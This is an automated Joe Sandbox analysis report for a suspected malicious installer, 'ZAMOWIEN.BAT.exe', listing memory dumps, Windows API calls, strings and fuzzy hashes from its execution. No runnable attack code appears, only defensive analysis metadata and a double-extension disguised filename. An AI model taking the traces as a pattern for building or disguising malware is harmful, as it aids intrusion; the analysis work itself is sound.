                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 722711167-2449383134
                                                                            • Opcode ID: e4596b53cd7fb5e771a9310aeb1d3daaf7ca364d2b1208b0680ff29771529a8d
                                                                            • Instruction ID: d8bcacbd7d2f0da6b2c8e47fbee56b79f045e9440a200938cb00b7756d8f7bcc
                                                                            • Opcode Fuzzy Hash: e4596b53cd7fb5e771a9310aeb1d3daaf7ca364d2b1208b0680ff29771529a8d
                                                                            • Instruction Fuzzy Hash: 0401A130502710EBC721AFA0AD48AAB7FACEB05706B14843BF441F11E8DA7C95558B9E
                                                                            APIs
                                                                            • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                            • wsprintfW.USER32 ref: 00402FEA
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1158693248
                                                                            • Opcode ID: 30a33e51ebb0687de2ab0f9de2b583d40bf8de1aa61be0624cc62e3c661608a6
                                                                            • Instruction ID: 35e0aa1bc14fc6f8dda882b0f095216f70f1679eddb38f3e3cab602ea1177d7e
                                                                            • Opcode Fuzzy Hash: 30a33e51ebb0687de2ab0f9de2b583d40bf8de1aa61be0624cc62e3c661608a6
                                                                            • Instruction Fuzzy Hash: 58F0317054020CABEF259F60DD4ABEE3B68FB44349F00C03AF605B51D0DBB99A559B99
                                                                            APIs
                                                                              • Part of subcall function 6E3512BB: GlobalAlloc.KERNEL32(00000040,?,6E3512DB,?,6E35137F,00000019,6E3511CA,-000000A0), ref: 6E3512C5
                                                                            • GlobalFree.KERNEL32(?), ref: 6E352743
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E352778
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: a47a6ed7ca3e042f860f9b982fc47037799f3a620311c0094aefb31b79e01e56
                                                                            • Instruction ID: 1193fc30a9fc470097b13f593200d492412306f03de2b8961491804e6618cb10
                                                                            • Opcode Fuzzy Hash: a47a6ed7ca3e042f860f9b982fc47037799f3a620311c0094aefb31b79e01e56
                                                                            • Instruction Fuzzy Hash: 6931AD71604A01EFCB19CFA4CAD4C6AB7BEFB86354724496DF14193321D732A826DBA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGlobal
                                                                            • String ID:
                                                                            • API String ID: 2979337801-0
                                                                            • Opcode ID: 68c29993daeb2e02daebe8d8575713380c179aa0bf1edb6d47dd807b8d417938
                                                                            • Instruction ID: 2af76e34b4ada95612c6b13c160f0214588eb4cef2ad33a75fc50eb734162380
                                                                            • Opcode Fuzzy Hash: 68c29993daeb2e02daebe8d8575713380c179aa0bf1edb6d47dd807b8d417938
                                                                            • Instruction Fuzzy Hash: 51510332D14D09AECB519FE9C840DAEBBBDEB45304F12855AD410A3318F772AA7D87A1
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E3522D8,?,00000808), ref: 6E3516D5
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E3522D8,?,00000808), ref: 6E3516DC
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E3522D8,?,00000808), ref: 6E3516F0
                                                                            • GetProcAddress.KERNEL32(6E3522D8,00000000), ref: 6E3516F7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E351700
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: c07d59605a65b2c75d645d55cc0fe62702679d77f35422937bfb0cf6644771ae
                                                                            • Instruction ID: 8a35dc26c1d9ca76e71b81c7b5fa1f4d4a2cd8929bd5618ed4266af11dac5c06
                                                                            • Opcode Fuzzy Hash: c07d59605a65b2c75d645d55cc0fe62702679d77f35422937bfb0cf6644771ae
                                                                            • Instruction Fuzzy Hash: C9F030722066387FDA2016A79C4CCABBF9CEF8B2F5B210355F729D229086614C12D7F1
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405F5D
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405F67
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405F79
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3081826266
                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction ID: a1bccca0734cb19cec55edcb2d79c084926cf842adef9b90b7d7329303d93a28
                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                            • Instruction Fuzzy Hash: 23D0A771101938AAC211AF548E04CDF639C9F86304741443BF601B30A1CF7D6D6187FD
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6E351171
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3511E3
                                                                            • GlobalFree.KERNEL32 ref: 6E35124A
                                                                            • GlobalFree.KERNEL32(?), ref: 6E35129B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6E3512B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true
                                                                            • Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 8dfc71b79d797c8839054847e5ff9bd882c3b44bc272753065261b31d31b983c
                                                                            • Instruction ID: b366facb0163075d7545ec69628b4cd532688a366884276aec09d27fc6206e7c
                                                                            • Opcode Fuzzy Hash: 8dfc71b79d797c8839054847e5ff9bd882c3b44bc272753065261b31d31b983c
                                                                            • Instruction Fuzzy Hash: DD517CB5500B02EFDB40CFA9C854E6677ACFB0A315F60499AE945DB310E775E928CBA0
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B9B,0000000A,?,00000008,0000000A,0000000C), ref: 00403C7A
                                                                            • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B9B,0000000A,?,00000008,0000000A,0000000C), ref: 00403C8E
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\nssF88.tmp, xrefs: 00403C9E
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nssF88.tmp
                                                                            • API String ID: 2962429428-1606597781
                                                                            • Opcode ID: e9799f2a870c612edbca9996970ca19c8aefa2ea74540a2b7a3064651f3422cf
                                                                            • Instruction ID: ee432799f0ec97ad8bac589890cd58f61dc0b37f2b9852f01e7d3a9725a2cd47
                                                                            • Opcode Fuzzy Hash: e9799f2a870c612edbca9996970ca19c8aefa2ea74540a2b7a3064651f3422cf
                                                                            • Instruction Fuzzy Hash: 08E08C3240471896E620AF7DEE4E9853B185F41335B248326F179F21F1C7389A9B5AA9
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 00405FA9
                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 00405FB9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-224404859
                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction ID: 55101ecdc9b25a232956a600f416f74c0c7d3acb65b29bb40db80f9a0bd4f09e
                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                            • Instruction Fuzzy Hash: 46D05EB2411921DAD312AB04DD00D9F67ACEF12300B468826E840A61A2DB785D9186BC
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 004060ED
                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00406105
                                                                            • CharNextA.USER32(?,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 00406116
                                                                            • lstrlenA.KERNEL32(?,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 0040611F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                            • Instruction ID: 69188793eccd29a777f9cf0bf9f116da7637de918d17396429826200b3a59f8b
                                                                            • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                            • Instruction Fuzzy Hash: D0F09631504458FFC712DFA5DD00D9EBFA8EF45350B2640B9E841FB211D674DE119B59

                                                                            Execution Graph

                                                                            Execution Coverage:0%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:100%
                                                                            Total number of Nodes:1
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 80907 32832b60 LdrInitializeThunk

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3 328335c0-328335cc LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2c797a71b90de460a3f409f9d5311cfc20bae4a0f266272b86ff329b0ec883c6
                                                                            • Instruction ID: b876ad6c7b7786083c87f716f7f8f78ff945cbe96852c29d14b8288a73e76615
                                                                            • Opcode Fuzzy Hash: 2c797a71b90de460a3f409f9d5311cfc20bae4a0f266272b86ff329b0ec883c6
                                                                            • Instruction Fuzzy Hash: 7590023560550807D100B1589A14706100547D0301F65C813A0424528D8BD58A6965A3

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 32832b60-32832b6c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5d546f405a82efbcf38434b52947e38c79bfae03cdbdaa7e6ebed4c55b706548
                                                                            • Instruction ID: 5232fe914cebe33a024c58d18382a45362806d4af8672fe76904b1bf62b6963f
                                                                            • Opcode Fuzzy Hash: 5d546f405a82efbcf38434b52947e38c79bfae03cdbdaa7e6ebed4c55b706548
                                                                            • Instruction Fuzzy Hash: 7B900265202404074105B1589914616400A47E0301B55C423E1014550DC9A589A96126

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1 32832c70-32832c7c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b0068462c756306acb575bd3a082d5216bb77dca74fcd1fd74885b4e9c3b3b07
                                                                            • Instruction ID: 7a8ba321eb05e14fbd7d69d5292b1b9c0c6875137c4168a37d95499366341c21
                                                                            • Opcode Fuzzy Hash: b0068462c756306acb575bd3a082d5216bb77dca74fcd1fd74885b4e9c3b3b07
                                                                            • Instruction Fuzzy Hash: EE90023520148C07D110B158D90474A000547D0301F59C813A4424618D8AD589A97122

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2 32832df0-32832dfc LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4c4828e382005cd38821005326ea8f4092c24f8971bf81ab1f40e1f5c96a0a2f
                                                                            • Instruction ID: c00839d008cd90881e2a0ba91d95ffbda3aac4d7cbed04148db352fe97cff8d1
                                                                            • Opcode Fuzzy Hash: 4c4828e382005cd38821005326ea8f4092c24f8971bf81ab1f40e1f5c96a0a2f
                                                                            • Instruction Fuzzy Hash: EA90023520140817D111B1589A04707000947D0341F95C813A0424518D9AD68A6AA122

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
